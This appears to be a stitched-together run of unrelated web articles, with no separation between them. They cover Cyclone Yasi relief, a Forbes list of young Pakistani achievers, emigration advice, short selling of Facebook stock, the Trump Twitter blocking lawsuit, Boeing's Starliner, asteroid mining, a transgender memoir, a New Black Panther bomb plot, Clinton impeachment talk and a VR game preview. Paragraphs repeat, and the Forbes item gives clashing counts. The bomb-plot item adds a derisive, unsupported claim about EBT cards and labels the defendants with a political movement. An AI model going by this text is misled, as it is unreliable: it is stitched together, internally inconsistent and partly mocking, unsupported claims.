JAMES KELLY: The Premier pleaded with residents to be patient, saying it took four weeks for electricity to be fully restored after Cyclone Larry.
While bad weather hampered the relief effort yesterday, the Army rolled in to Ingham overnight.
Soldiers were briefed on what they could expect.
NEIL ROBERTS, EMERGENCY SERVICES MINSTER: There are large teams of people in the area and moving into the area today and over the weekend to provide that additional support.
BOB ATKINSON: The other think we're doing is putting two Water Police vessels off Cardwell. One of those is a very large vessel and it's like a mobile police station.
JAMES KELLY: Police say they're out in force. Six people have been arrested for looting in Townsville.
Help is also on its way from outside the State. SES (State Emergency Services) volunteers flew north this morning from Canberra.
TONY GRAHAM, CHIEF OFFICER ACT SES: The tasking will be quite varied as we understand it, particularly about assisting residents in recovering their valuables from their properties. Particularly those residents that have lost their homes.
JAMES KELLY: The Federal Government is also poised to hand out disaster relief payments. As the Prime Minister toured Innisfail and Townsville they announced payments of $1,000 for every adult affected by the cyclone, $400 per child.
Yasi has sparked fresh debate about the Federal Government's proposed flood levy. Julia Gillard says they won't be using it to rebuild cyclone affected areas.
JULIA GILLARD: No we won't. We will need to find additional resources in the Federal Government's budget.
JAMES KELLY: Exactly what Tony Abbott's been saying all along.
TONY ABBOTT, OPPOSITION LEADER: The Prime Minister knows that there are savings there in the budget.
ANNA BLIGH: This is a catastrophic event and it requires all of us to rise to the occasion. And that means politicians putting politics aside.
JAMES KELLY: While the exact cost of the cyclone won't be known for some time, the Federal Government spent half a billion dollars after Cyclone Larry.
Tonight, the town of Cardwell remains cut off.
The Weather Bureau has issued flood warnings for a number of rivers between Cairns and Townsville.
James Kelly, Lateline.
Six individuals of Pakistani origin have featured on Forbes magazine's '30 under 30' list released on Tuesday.
The list, which is released annually, features 600 individuals making strides in 20 different industries, including art and style, education, games, food, enterprise technology and media.
The four individuals of Pakistani origin featured in the 2018 list have been selected for their achievements in the industries of retail and e-commerce, enterprise technology and education.
Anna Khan, 29.─Photo courtesy: Forbes
Anna Khan, 29, has made it to the list for sourcing several breakout startups since joining Bessemer Venture Partners in February 2012 — they have raised over $141 million in total financing. Khan was named a “Global Shaper” by the World Economic Forum and a Rock Centre Fellow by Harvard Business School.
Sarah Ahmed, 28.─Photo courtesy: Forbes
Sarah Ahmed, 28, was selected for their work in the retail and e-commerce industry. The New York-based entrepreneur founded Warp + Weft, "a premium denim brand that weaves its own fabric to guarantee the best value and fit."
Ahmed's brand aims to increase size inclusivity.
S. Zayd Enam, 25, founder at Cresta.ai.─Photo courtesy:Forbes
Two individuals of Pakistani origin have been selected in the enterprise technology category. S. Zayd Enam, 25, and Khizer Hayat, 28.
Enam, who dropped out of high school to start Mediconnect, "a healthcare provider platform in Pakistan", also later dropped out of their PhD program at Stanford University and founded Cresta.ai ─ a startup that aims to scale and improve the quality of customer services.
Hayat, founder at ThroughPut.─Photo courtesy: Forbes
Hayat is the president of Teach Pakistan Initiative, a non-government organisation working to improve the rural education system in Pakistan.
They feature on the list as co-founder of ThroughPut, "a data science automation company which estimates waste in supply chain and logistics operations and offers recommendations to eliminate bottlenecks and areas of concern."
Raza Munir, 29, co-founder at Climb Credit.─Photo Courtesy: Forbes
The final Pakistani to appear on the list is Raza Munir whose startup, Climb Credit, aims to help students in skills-based fields manage their debt.
According to Forbes, Munir, featured under the Education category, has provided affordable loans to 5,000 students attending 60 schools.
They founded Credit Climb along with Zander Rafael, Amit Sinha and Vishal Garg.
Abbas Haider, 28, co-founder at Aspetto.─Photo Courtesy: Forbes
Abbas Haider, 28, has made it to the Forbes list under the 'Manufacturing and Industry' category for co-founding Aspetto, a clothing firm that deals in comfortable, tailor-made, bullet-resistant clothing. Haider's business has already raised $300,000 in seed funding and is set to see its 2017 revenue increase$2.5 million.
It was one of the most heartbreaking moments in my life – in the Aiport. Holding a one way ticket to a totally different life, I was saying my goodbyes to the people that I knew I might not see ever again. Everything in that turned out to be even worse than I thought at that moment, but I'll leave it to another heartbreaking post.
I know I am not the only one. And there will be even more people doing it as well, due to the whole mobility aspect of the modern world – people want to live where they belong and itb is finally not that difficult. So I decided to sum up things that I learned as a person who left the previous life behind and share some tips for those who is going to make a big move or going through it right now.
The life is divided on Before and After. And there is no way around it. New experiences and new people do not only mean different surrounding to hang out with – it alters your plans, dreams, preferences and tastes. New experience brings changes in your personality, way of thinking, approaches, opinions, views. Even if you think it's not going to happen to you, – it will!
And there is no way around it. New experiences and new people do not only mean different surrounding to hang out with – it alters your plans, dreams, preferences and tastes. New experience brings changes in your personality, way of thinking, approaches, opinions, views. Even if you think it's not going to happen to you, – it will! There WILL be a gap between you and those who were left behind. Because they stayed where you were just a few months ago. Their every day life and surrounding hasn't changed, whereas your every day is now a caleidoscope of new things and faces and none of them is the ones you used to know for few years, graduated from school with or were missing the lectures with laughing in the nearest coffee shop. None. Of. It.
Because they stayed where you were just a few months ago. Their every day life and surrounding hasn't changed, whereas your every day is now a caleidoscope of new things and faces and none of them is the ones you used to know for few years, graduated from school with or were missing the lectures with laughing in the nearest coffee shop. None. Of. It. Disappointmen. Those who was with you every second, was holding your veil on the wedding, shared all the secrets AND promised their friendship forever – might dissolve in routine at home withing next couple of months or even weeks after your departure. But I have good new for you. Aside from disappointment there will be plenty of…
Those who was with you every second, was holding your veil on the wedding, shared all the secrets AND promised their friendship forever – might dissolve in routine at home withing next couple of months or even weeks after your departure. But I have good new for you. Aside from disappointment there will be plenty of… Surprises . People who you weren't that much in touch or weren't even sure if you both will make it to the next year – they suddenly become an example of support and they're there when you need them. In a year time you might be very surprised evaluating who stayed with you and who didn't…
. People who you weren't that much in touch or weren't even sure if you both will make it to the next year – they suddenly become an example of support and they're there when you need them. In a year time you might be very surprised evaluating who stayed with you and who didn't… It is hard. Not only the novelty is scary. Now – you are for sure on your own. At home there's the language that you grew up on, dad's connections when you're looking for a job, mom's gentle hands when you failed/hurt and crying on their shoulder and “walls that help”. But on this continent – you are on your own. There's absolutely no way to prove and establish yourself other than showing that you have brain, ethic and can work hard. And no, nothing will ever prepare you to what you WILL have to go through.
But I have good news for you. It IS possible. And don't ever listen to anyone with their “Nobody is waiting for you there”, “The grass is greaner on the other side”, “You think you are the smartest?” and many many others that I personally heard… Because the answer to all of them – YES, someone IS waiting for my work ethic and competence; YES, it is actually better in a place you chose to move and YES, I am smart enough to prove it.
There are few tips that I can give so far:
Don't listen to anyone – pursue your dreams. The explanation is above. Plus – people talk, advice, demotivate and then they turn around and go back to their life like nothing happened and don't ask you how you are dealing with your life when you meet in a month. Not worth it.
Make efforts to keep in touch. It's better to act and show that your relationship is important even if you are 2000 miles away from each other. Keep being a bigger person even when someone is not that responsive and proactive. The life will put everything and everyone on its places, but it's better to know that you did everything you had and could do. Skype, e-mail and a million different messengers – it is all possible, there's no excuse with nowadays technology not to be in touch. With my best frient I text every single day pretty much, I sometimes know what they had for lunch. But with the rest I'm not.
Share. You will have incredibly busy life. You will have incredibly difficult life. Especially in the beginning. You will struggle with many things. Don't close up. Your friends and family from the past are always there, one call away (God bless technology). They have the right to know what is happening to you, besides they can sometimes provide a very unexpected help. You will only benefit from it.
Work hard. Forget about everything for the first year and focus on getting education, finding work and establishing yourself there. It's like at school – at first you work on your reputation and then your reputation works on your behalf. You will have a chance to go to all those amazing parties few months later. Trust me, parties won't go anywhere.
Make time for yourself and enjoy doing what you like. There is so much happening that you NEED to reflect on things. A quiet evening with a book and a journal, talk on Skype with a friend, just staying in bed with a cup of tea/wine/hot chocolate on Sunday – a great opportunity to think about your new life and make the information to sink in instead of accumulating stress in a go-go-go pace.
Explore! New park, new coffeeshop, new streets. It is your new home now. Get familiar with it and make it YOURS. It is so much fun! That – I can promise.
Don't forget to subscribe in the right bottom corner to get the next article into your e-mail.
Have an amazing day!
NEW YORK (Reuters) - Short sellers desperate to bet against Facebook shortly after its debut on public markets are now getting their chance.
A Facebook application logo is pictured on a mobile phone in this photo illustration taken in Lavigny May 16, 2012. REUTERS/Valentin Flauraud
Shares of the much-anticipated IPO have fallen sharply since they opened at $42.05 on Friday amid an initial flurry of trading problems at the Nasdaq and after news that top underwriters cut their revenue estimates just days before the offering.
Yet, short sellers are still eager to bet against the stock given its lofty valuation.
Facebook shares were up 3.1 percent to $31.97 on Wednesday, still down 16 percent from their $38 IPO price. Interest from short-sellers was high, but as more shares became available to borrow, the cost was decreasing.
“Right now it's unlimited demand - everybody is looking for it because everybody initially wants to put the short on,” said a lending agent at a securities lending agency, which finds shares for brokers to borrow to lend to hedge funds and other clients.
Short sellers borrow shares and sell them in the open market. They aim to buy the shares back at a lower price, return them to the borrower and pocket the difference.
“I believe this will change pretty dramatically over the next couple of days,” the agent said.
The cost to borrow the stock varied from 5 percent to 50 percent on an annualized basis, according to several securities lending sources and hedge fund managers trying to borrow the stock.
That is far in excess of so-called “general collateral” stocks, which lend at a few basis points, but below other recent Internet IPOs, such as those of Groupon or LinkedIn, which carried such expensive annual borrowing costs that the only way to profitably bet against them was to do so for at most a few days.
Automated Equity Finance Markets, a securities lending agency in New York, said the cost to borrow Facebook stock on Wednesday was below a 10 percent annualized rate, for a theoretical cost of less than $3 to short a $30 stock for a year.
One prime broker intending to borrow stock on behalf of hedge fund clients on Wednesday paid an annualized rate in the mid-20 percent range, the lending agent said.
“This is a very interesting situation,” said the lending agent, who asked not to be named as their company does not talk about individual companies. “Every hedge fund or person making a decision on the short has their own idea on this right now. It's going to settle into a market, but it hasn't settled in yet.”
Short sellers of LinkedIn had to borrow at a cost of 11 percent to 99 percent in its first three months of trading, although not many shares traded at the top end of the range, according to Automated Equity Finance Markets, a securities lending platform.
Borrowers of Groupon faced a range of 20 percent to 85 percent while short sellers of Zynga paid 2 percent to 44 percent in the first three months, according to Automated Equity Finance Markets.
Data Explorers, a firm that tracks short-selling data, ranks Facebook's stock a 10 in terms of its cost to borrow on a scale of 1 to 10 where 10 is the most expensive. No S&P 500 stocks have a rating of 10, Data Explorers said.
Wednesday marks the first day that Facebook's securities are officially on loan due to the three-day settlement rule for U.S. securities. However, some managers began shorting the stock shortly after trading started on Friday.
“We got a small allocation in the IPO and sold it immediately and then shorted on Friday and Monday,” said one hedge fund manager, who said they went short without knowing the cost of borrowing.
When contacted by Reuters on Wednesday morning, the manager said they were told by their broker that they were charged a negative rebate of 55 percent. On Friday and Monday, Facebook shares were hard to borrow because there was a limited supply of the stock to lend, they said.
Now, the supply of Facebook shares to borrow has increased a lot, reducing the cost.
“There's a huge amount of supply now, especially lots of retail supply,” the hedge fund manager added, noting that they were planning to hold their short position.
“There's a lot of bad news and finger-pointing around this and the markets are still weak,” they said.
Approximately 18 million shares of Facebook's stock were on loan for short selling as of May 22, according to Data Explorers. Facebook shares on loan for short sellers represent about 4 percent of the free float, though that figure will change as more data becomes available in coming days.
Facebook's stock has fallen as low as $30.94, or 19 percent below its IPO price of $38, and more than 30 percent from a peak of $45 reached shortly after it started trading Friday.
The drop on Tuesday came after Reuters reported that underwriters had cut their revenue estimates for the stock shortly before the IPO, a highly unusual move.
(Editing by Steve Orlofsky)
Donald Trump's personal Twitter account is the subject of a lawsuit filed on Tuesday by several users of the platform, including seven people whose accounts were blocked by the president after expressing their views in response to their posts.
The lawsuit argues (pdf) that by blocking users from viewing and replying to the account's tweets, Mr. Trump and members of their communications team are violating the users' First Amendment rights.
The group is represented by the Knight First Amendment Institute at Columbia University. Most of the plaintiffs, who include a sociology professor, a police officer and former Guantanamo Bay guard, and several writers, questioned or criticized Donald Trump and their policies by tweeting at their account before they were blocked. One, a writer named Joe Papp, was blocked a day after they responded to Trump's withdrawal from the Paris Agreement on climate change and the president's statement that they "was elected to represent Pittsburgh, not Paris."
Why didn't you attend your #PittsburghNotParis rally in DC, Sir? #fakeleader — Joe Papp (@joepabike) June 3, 2017
The Knight First Amendment Institute also joined the suit, arguing that even though it has not been blocked by @realDonaldTrump, the blocking of other users is a violation of its First Amendment right to hear from others in what should be considered a public forum.
SCROLL TO CONTINUE WITH CONTENT Help Keep Common Dreams Alive Our progressive news model only survives if those informed and inspired by this work support our efforts
The Twitter account in question is the same one that Trump used before they became president, but the suit argues that because Trump's heavy Twitter use has changed the way an American president engages with the public, their account deserves special distinctions. It states:
Because of the way the President and their aides use the @realDonaldTrump Twitter account, the account is a public forum under the First Amendment...Defendants have promoted the President's Twitter account as a key channel for official communication...The President's advisors have stated that tweets from @realDonaldTrump are 'official statements', and they have been treated as such by politicians, world leaders, the National Archive and Records Administration, and federal courts.
The Institute sent a letter to the White House in June asking Trump and their staff to unblock the users; the suit was filed after the letter was ignored.
Some aren't convinced that Trump's Twitter account qualifies as a public space. Following news of the Institute's letter to the White House, Bloomberg columnist Noah Feldman argued that free speech rights don't exist on Twitter because the platform is a private company.
"Trump's account is a stream of communication that's wholly owned by Twitter, a private company with First Amendment rights of its own," wrote Feldman. "Twitter can establish any rules it wants in its private domain. That includes allowing users to block anyone they choose, for any reason."
But the lawsuit argues that Twitter has been characterized as a public space recently by the Supreme Court. In Packingham vs. North Carolina in June, the Court ruled (pdf) that barring registered sex offenders from using social media sites including Twitter was unconstitutional. It characterized Twitter as part of "the modern public square" and noted, "users can petition their elected representatives and otherwise engage with them in a direct manner. Indeed, Governors in all 50 States and almost every Member of Congress have set up accounts for this purpose."
I am a Computer Programmer Created by Jimmy Jacobson
My First Computer Macintosh 512k
My First Code BASIC 10 PRINT "Hello World!" 20 GOTO 10
My First Program Choose Your Own Adventure
Important Rules
Never be afraid to say "I don't understand".
Never make fun of someone for not understanding.
Always be willing to share what you have learned and coded.
Unless it's homework or a test.
What Kind of Jobs can a Computer Programmer Do? Make Video Games Program Robots Websites Apps Teach
Questions? I have some if you don't Am I going to learn everything I need to know in school? Is writing code pretty much the most fun thing ever? Is writing code going to make me rich? Did you REALLY make a website called Wedgies.com?
First view of the Boeing CST-100 ‘Starliner' crewed space taxi at the Sept. 4, 2015 Grand Opening ceremony held in the totally refurbished C3PF manufacturing facility at NASA's Kennedy Space Center. These are the upper and lower segments of the first Starliner crew module known as the Structural Test Article (STA) being built at Boeing's Commercial Crew and Cargo Processing Facility (C3PF) at KSC. Credit: Ken Kremer /kenkremer.com
Story/photos updated[/caption]
KENNEDY SPACE CENTER, FL – ‘Starliner' is the new name of America's next spaceship destined to launch our astronauts to orbit. The new commercial craft from Boeing will restore America's capability to launch American astronauts from American soil to the International Space Station (ISS) in 2017 – and the magnificent looking first capsule is already taking shape!
Built by The Boeing Company, ‘Starliner' was officially announced by Boeing and NASA as the new name of the company's CST-100 commercial crew transportation spacecraft during the Grand Opening event for the craft's manufacturing facility held at the Kennedy Space Center on Friday, Sept 4. 2015 and attended by Universe Today.
‘Starliner' counts as history's first privately developed ‘Space Taxi' to carry humans to space – along with the Crew Dragon being simultaneously developed by SpaceX.
“Please welcome the CST-100 Starliner,” announced Chris Ferguson, the former shuttle commander who now is deputy manager of operations for Boeing's Commercial Crew Program, at the Grand Opening event hosting numerous dignitaries.
The CST-100 ‘Starliner' is at the forefront of ushering in the new commercial era of space flight and will completely revolutionize how we access, explore and exploit space for the benefit of all humankind.
Starliner will be mostly automated for ease of operation and is capable of transporting astronaut crews of four or more to low Earth orbit and the ISS as soon as mid 2017 if all goes well and Congress approves the required funding.
“One hundred years ago we were on the dawn of the commercial aviation era and today, with the help of NASA, we're on the dawn of a new commercial space era,” said Boeing's John Elbon, vice president and general manager of Space Exploration.
“It's been such a pleasure to work hand-in-hand with NASA on this commercial crew development, and when we look back 100 years from this point, I'm really excited about what we will have discovered.”
The CST-100 ‘Starliner' will be produced in Boeing's newly revamped manufacturing facility dubbed the Commercial Crew and Cargo Processing Facility (C3PF) on site at the Kennedy Space Center in Florida.
The CC3P building was previously known as Orbiter Processing Facility-2 (OPF-3) and utilized by NASA to process the agency's space shuttle orbiters between crewed flights during the three decade long Space Shuttle program.
“When Boeing was looking for the prime location for its program headquarters, we knew Florida had a lot to offer from the infrastructure to the supplier base to the skilled work force,” said Chris Ferguson.
“Starliner will launch on an Atlas V from pad 41 at Cape Canaveral Air Force Station in Florida. It has the capability to dock at the ISS within 24 hours. It can stay docked at the station for 6 months.”
Over the past few years, the historic facility has been completely renovated, upgraded and transformed into a state of the art manufacturing site for Boeing's commercial CST-100 Starliner.
Boeing was awarded a $4.2 Billion contract in September 2014 by NASA Administrator Charles Bolden to complete development and manufacture of the CST-100 space taxi under the agency's Commercial Crew Transportation Capability (CCtCap) program and NASA's Launch America initiative.
It is also a key part of NASA's overarching strategy to send Humans on a “Journey to Mars” in the 2030s.
“Commercial crew is an essential component of our journey to Mars, and in 35 states, 350 American companies are working to make it possible for the greatest country on Earth to once again launch our own astronauts into space,” said NASA Administrator Charles Bolden. “That's some impressive investment.”
The commercial crew program is designed to return human spaceflight launches to the United States and end our sole source reliance on Russia and the Soyuz capsule for all manned flights to the ISS and crew rotation missions.
Since the forced retirement of NASA's shuttle orbiters in 2011, US astronauts have been totally dependent on the Russians for trips to space and back.
SpaceX also received a NASA award worth $2.6 Billion to build the Crew Dragon spacecraft for launch atop the firms man-rated Falcon 9 rocket.
Final assembly of both half's of Starliner will take place in the C3PF – namely the crew command module and the service module.
Boeing is already building the first version of Starliner known as the Structural Test Article (STA) . The STA will be used for extensive prelaunch testing and evaluation to ensure it will be ready and robust and capable of safely launches humans to orbit on a very cost effective basis.
The Starliner STA is rapidly taking shape. The first components have been built and were on display at the C3PF Grand Opening eventy of Sept. 4. They are comprised of the upper and lower halves of the crew command module, the crew access tunnel and adapter.
The shell of Starliner's first service module was also on display.
“The STA will be completed in early 2016,” said John Mulholland Boeing Vice President, Commercial Programs, at the event.
“Then we start assembly of the Qualification Test Article.”
I asked Mulholland to describe the currently planned sequence of Starliner's initial uncrewed and crewed flights.
“The first uncrewed flight is expected to occur in May 2017. Then comes the Pad Abort Test in August 2017. The first crewed flight is set for September 2017. The first contracted regular service flight (PCM-1) is set for December 2017,” Mulholland told me.
“It's all very exciting.”
“Kennedy Space Center has transitioned more than 50 facilities for commercial use. We have made improvements and upgrades to well-known Kennedy workhorses such as the Vehicle Assembly Building, mobile launcher, crawler–transporter and Launch Pad 39B in support of Orion, the SLS and Advanced Exploration Systems,” said Robert Cabana, Kennedy's center director.
“I am proud of our success in transforming Kennedy Space Center to a 21st century, multi-user spaceport that is now capable of supporting the launch of all sizes and classes of vehicles, including horizontal launches from the Shuttle Landing Facility, and spacecraft processing and landing.”
Read my earlier exclusive, in depth one-on-one interviews with Chris Ferguson – America's last shuttle commander and who now leads Boeings CST-100 program; here and here.
Stay tuned here for Ken's continuing Earth and planetary science and human spaceflight news.
Ken Kremer
As promised, Bellevue, Washington-based Planetary Resources is letting everyone else in its plans. The project, backed by Google's Larry Page and Eric Schmidt, film director James Cameron, and Ross Perot Jr., will initially focus on the creation of low-cost robotic spacecraft designed for use in surveying missions. Ultimately, the company hopes that the technology it creates will be used for the extraction of precious metals from space — invaluable as the supply available on Earth dwindles.
Planetary Resources hopes to begin mining in space within the next 10 years
The firm plans to have its first craft in orbit around Earth within the next two years, and by 2022 hopes to progress from observation platforms to selling prospecting services. It believes that it will be able to mine some of the thousands of asteroids that pass near to earth each year, and expects to discover expensive metals like Platinum in abundance. Much like Elon Musk's SpaceX and Richard Branson's Virgin Galactic, Planetary Resources sees scientific bodies like NASA as its likely first customers. It also has the potential to look for more than metals — as founder Peter Diamandis told Reuters, "everything we hold of value on — metals, minerals, energy, real estate, water — is in near-infinite quantities in space."
The full extent of Planetary Resources' plans will be detailed in a public webcast at 1:30PM ET today — check out the company's website for more details.
Update: We've currently covered the event live over here.
Life is full of choices!
Sometimes I struggle to decide whether I think this is a cliché or just a fact of life. I know that there are certain facts that are not choices. I believe that knowing our identity as one of them. I do subscribe to the following:
We do not have a choice in being transgender.
We do have a choice in what we do about it.
Whenever I think about all the choices I have made in my life -- getting married, having kids and ultimately transitioning, I always wrestled with the choices in front of me. Which path should I take? What are the pros; the cons? Am I being selfish? Will someone get hurt? So many voices inside of me are arguing for each position it is often hard to be living in my own head! I constantly wondered why in the world are they doing that?
There have been so many times have I been faced with life changing choices. None of them were easy; as I let all those inner voices have their say. For most of those choices I sat without any movement for a long, long time before I took any action at all.
I suspect that almost everyone has seen the movie The Matrix. I marveled at how quickly Neo chose the Red Pill in the classic scene and was willing to go down the rabbit hole. It took me over five decades to be willing to go down my own rabbit hole to chase my Truth!
...
After my marriage ended in 2001, I was again single and wrestled with so many choices about my life. Deep down inside I knew that I was transgender but not another soul in the world knew of my inner struggle. My body and brain were still waging the war they have done for decade upon decade. My body had "needs!" You know what I mean. I got horny, I got turned on by women or thoughts of women. I needed release, pleasure it is called. I needed to reach that rolling alignment of neurons firing in unison as it travelled through my body and culminated in that release all of which we call orgasm. My body needed it, demanded it! Then there were parts of my mind that took over with the pangs of guilt and telling me it was so wrong as I was not really a man!
It did not matter whether I was with a partner or by myself, my body demanded that its needs were fulfilled. I was in my mid 50's and finding it harder and harder to give the body what it wanted as it was struggling to get the release it desired.
Every night after work, my apartment was my big closet where the man disappeared and the woman appeared and dreamt that someday they would be real. It was their version of Pinocchio, as they wanted to be a "real girl!"
The war continued; my body wanted sex and pleasure, my mind wanted to live their truth. Like Neo in the Matrix I had to choose between pills, although they were both blue ones. One pill would allow the body to get what it desired, or as Neo was offered to wake up in my bed and believe what ever I wanted to believe.
The choice for the body
The other pill, would undoubtedly allow me to stay in Wonderland and take me down the rabbit hole deeper and deeper with no way to return.
Estradiol, 2MG
The choice for the mind
There was no voice like Morpheus within me to ever tell me it was my last chance to choose. I knew that the first choice was the easy one, but yet even when I chose it, the inner battle continued. The voices in my head to choose the rabbit hole were getting louder and stronger, even though the voices expressing fear and uncertainty were just as loud. In January 2010, I chose to go down the rabbit hole and find my truth.
...
I have made many choices in my life. Some turned out well and some were less successful. One choice in my life was to seek and follow my truth. It really does matter that it took me so many years before I did this. I never look back; I never ask that useless "what if" question. The fact that I always knew my truth but spent so much of my life denying it and letting my body have its needs fulfilled and listen to the voices of fear and shame are all in the past. I am happy to share them now because I know that although my own specific journey is unique, there are many others on journeys with variations on this theme and it is so hard to talk about our internal wars between our bodies and our minds when we are transgender.
For me, the trip down the rabbit hole is one that I am so happy to be taking as I go deeper and deeper into my truth. By body and mind are both at peace as they travel as partners along my adventures in my own Wonderland of just discovering and being me in each moment.
I have chatted with many friends how challenging these choices are as all the voices in their heads argue endlessly and get stuck. I have been there and know what that feels like, and I never can tell anyone how to choose their or their path. My own experience has allowed me to reflect that my body never really knew or cared about my mind's truth, but over time, my mind's dreams have outlasted my body's perceived needs. This is just my story, and may not be true for anyone else.
I can only repeat what Morpheus told Neo -
"All I can offer is the Truth. Nothing More."
If you seek yours, it will be yours and yours only!
...
A big thank you to Lana W for helping create the world of the Matrix and teaching us all about these choices.
###
New Black Panther Leaders Sentenced to 7 Years in Prison for Plotting Major Bomb Attack on #Ferguson Police Dept
Peaceful Protests—
Two New Black Panthers members were indicted in April on charges they were planning to bomb public buildings including the Ferguson police station.
The two panthers admitted in court they were plotting a major bomb attack but ran out of money on their EBT cards.
Brandon Orlando Baldwin, 22, and Olajuwon Davis,22 were indicted on charges by federal agents.
Two St. Louis men were ordered Thursday to spend seven years in federal prison for planning a foiled bomb attack targeting the Ferguson police chief, the county's prosecutor and other officials after last year's police shooting death of Michael Brown.
Olajuwon Ali is the local leader of the New Black Panther Party in St. Louis. Last year they released a video inviting local blacks to join their group.
The two #BlackLivesMatter activists admitted in court that they were planning to blow up the Ferguson police station and murder St. Louis County Prosecutor Bob McCulloch… But they didn't have enough money on their EBT card!
Some top Republicans are already floating the idea of impeaching Hillary Clinton and yet they haven't even been elected president.
The chairperson of the House Homeland Security Committee, Rep. Michael McCaul of Texas, brought up that scenario in an interview Wednesday.
“Assuming they win, and the investigation goes forward and it looks like an indictment is pending, at that point in time, under the Constitution, the House of Representatives would engage in an impeachment trial. It would go to the Senate, and impeachment proceedings and removal would take place,” they said.
Sen. Ron Johnson, R-Wisconsin, who is in a tight reelection race, told a local paper Monday that Clinton's actions involving their private email servers as secretary of state are impeachable offenses.
“She purposefully circumvented it (the law), this was willful concealment and destruction,” they said. “I would say yes, high crime or misdemeanor, I believe they are in violation of both laws.”
In an interview with The Washington Post, Rep. Trent Franks, R-Arizona, the chairperson of a House Judiciary subcommittee, said he's personally convinced they should be impeached because of their influence deriving from the Clinton Foundation, the report said.
“It is my honest opinion that the Clinton Foundation represents potentially one of the greatest examples of political corruption in American history,” they said. “Now that perspective may be disproven, time will tell. But given that conviction on my part, I think all options are definitely on the table.”
Even Donald Trump has hinted at it on the campaign trail.
“Here we go again with Clinton, you remember the impeachment, and the problems? She's likely to be under investigation for many, many years, also likely to conclude in a criminal trial. This is not what we need in this country, folks,” they said at a rally Thursday in Jacksonville, Florida.
But other top Republicans are saying it's too early to be raising the idea.
Rep. Darrell Issa, R-California, the former chairperson of the House Oversight and Government Reform Committee, said everyone should “calm down.”
“Okay, I'm gonna say, be the adult in the room and say, ‘Calm down, back off, it's not gonna happen,'” Issa said Wednesday on the “Brett Winterble Show” on KFMB San Diego, according to The Huffington Post. “The fact is we have impeached and removed from office nine federal judges in our history, no members of the executive branch, not a president, not a vice president, not a cabinet officer, so floating that word is usually a fairly reckless thing.”
Sen. John Cornyn, R-Texas, the majority whip, said it's “premature” speculation.
“Well, I think that's premature myself, to be talking about that because of course they haven't been elected or sworn into office,” Cornyn said Tuesday in an interview with “The Wells Report” on 660 AM The Answer. “And unless there is some additional evidence that the FBI director and the [Justice Department] would take to a grand jury, then they are not likely to be convicted of a crime.”
House Minority Leader Nancy Pelosi, D-California, blasted Republicans in a statement Thursday for discussing impeachment.
“In addition to there being no grounds for impeachment to begin with, moving to impeach President Hillary Clinton for alleged activities from before the election would be a brazen attempt to nullify the vote of the American people, outside our constitutional framework and destructive to the Framers' intent,” they said.
Election Day is Tuesday.
Spies live a life that's as deadly as it is stylish. The cool cars, fancy gadgets and killer wardrobe are balanced against an array of death traps set by evil supervillains (mad scientist/industrialist types, not superpowers) but it's nice work if you can handle the lifestyle. I Expect You to Die puts you in the seat of a spy carrying out missions to take down a madman with too much money and a desire to spend it dominating the world, and it puts the Oculus Rift through its paces in the process.
I Expect You to Die initially came out as an experimental locked-room type of game for the DK2 version of the Rift and picked up a nice pile of awards, so now it's being expanded to a full game complete with support for the Oculus Touch controllers. It's still playable with mouse or gamepad, of course, but having gotten a hands-on PAX East demo with Touch controllers it's hard to imagine playing it any other way.
The demo starts with you seated at a desk and a few cards scattered about with instructions. Controls are simple enough, using two buttons on each controller and the thumb stick, and the in-screen representation of the Touch controller is a pair of hands that tracks perfectly to you real-world hand position. This was my first time getting a chance at the Touch controls and the thing that still impresses me is that, after the helpful rep got the Rift situated on my head, I could see where my “hands” were as they held them clearly enough to just reach and accurately get them, even with my eyes completely covered by the screen.
The rest was pretty simple, from a control perspective. The middle-finger button on each controller was to grab something with that hand, keeping the button held down until you want to drop it, and the index-finger button used the item. Holding down the action button let you set an instruction card in mid-air for easy reference, which is now an ability I need in real life. Grab a lighter and hit the action button and the top pops open and flame springs up, and holding the lighter to a hovering card set it on fire.
The final ability was a little light telekinesis, activated by pushing up on the thumb stick. This shoots a blue circle out into the environment, and hitting the grab button holds on to whatever's highlighted. See a book on a shelf out of reach? Shoot out the blue ring, grab, and reel it in by pulling back on the thumb stick. Don't need it? It only took a second to reverse the process, putting the book back where it came from or just tossing it to the side. In practical terms it's an excellent way to keep the player sitting rather than walking around the environment.
After a short time in the tutorial room (too short, but there was only one demo unit and a line behind me that I was holding up) it was time to do the demo mission, where things get properly playful. The job at hand was to steal a car from the back of an airplane, but of course the car is trapped, you can't leave the driver's seat, and the rear door of the plane is sealed shut. It's a day's work for a spy, though, so the first thing to do is explore the environment and see what tools are available.
None of the car's devices do much without power, and the key isn't in the ignition, but having watched more than one movie it's not hard to get past that problem. The retinal scan doesn't go well, though, setting off a series of traps that end with a bomb dumped on my lap. Defusing it led to one of the more interesting issues with the game, because the spy doesn't have a body. This is done to eliminate the player seeing a body that very clearly isn't theirs, but this led to two separate bits of weirdness. The first is looking down and suddenly feeling like one's legs have turned into a car seat, and the second was one stick of dynamite rolling into the driver's side chair. I like a tidy workplace so, while it wasn't technically necessary, my first response was to not have a heavy explosive in my lap. It took several tries reaching for it to realize that 1) my real-world body was in the way and 2) I was pawing at my groin in front of an audience. While holding a Touch controller. Really, the controller and I are just good friends *cough*withbenefits*cough*
Asking the developer afterwards it turns out that's pretty common. Remove the image of the body and people automatically start working as if it's not there, despite decades of experience otherwise. It's not that people forget how to move or anything as excessive as that, but that they'll try to reach through the thing they know is there but can't see. It's an interesting side-effect of I Expect You to Die's approach to representing the player, and should provide much hilarity for those who already think people look silly flailing about inside their virtual worlds.
What made I Expect You to Die special was the one-two punch of interactivity and presence. It's still early days in VR so games like this have far more impact than they will five years down the line, but it's not five years from now yet so being able to pick up, turn things, activate them, and solve puzzles by playing with items mapped to the controls on a pair of controllers feels instantly engaging. Rolling down the car window with one hand while using telekinesis with the other to pull over a screwdriver on a far shelf, then closing the window with the first hand again so the poison gas couldn't flood the car was a fun test of multitasking. Turning around and reaching back to pick up the gun on the back seat, twisting and turning and aiming it, felt really special.
There were ways to play with the level outside of simply solving the puzzle that I didn't get around to trying, such as tossing a wad of $100s out the window to watch them get sucked out of the rear of the plane, and each of I Except You to Die's four levels will have plenty of details like that. Asking about the four levels, I was assured that the next three are bigger, more open and more complicated, with plenty of toys to play with and ways to mess around that have nothing to do with a straight path to the solution. The locked-room puzzle box is a well-established genre at this point, but I Expect You to Die‘s VR approach to it breathes new and playfully fascinating life into the familiar experience.
Earlier today, the Attorney General for the state of New York accused the folks at Sprint-Nextel Corp of deliberately failing to collect more than $100 million in sales tax from customers — and now they want the nation's third-largest wireless provider to pay up.
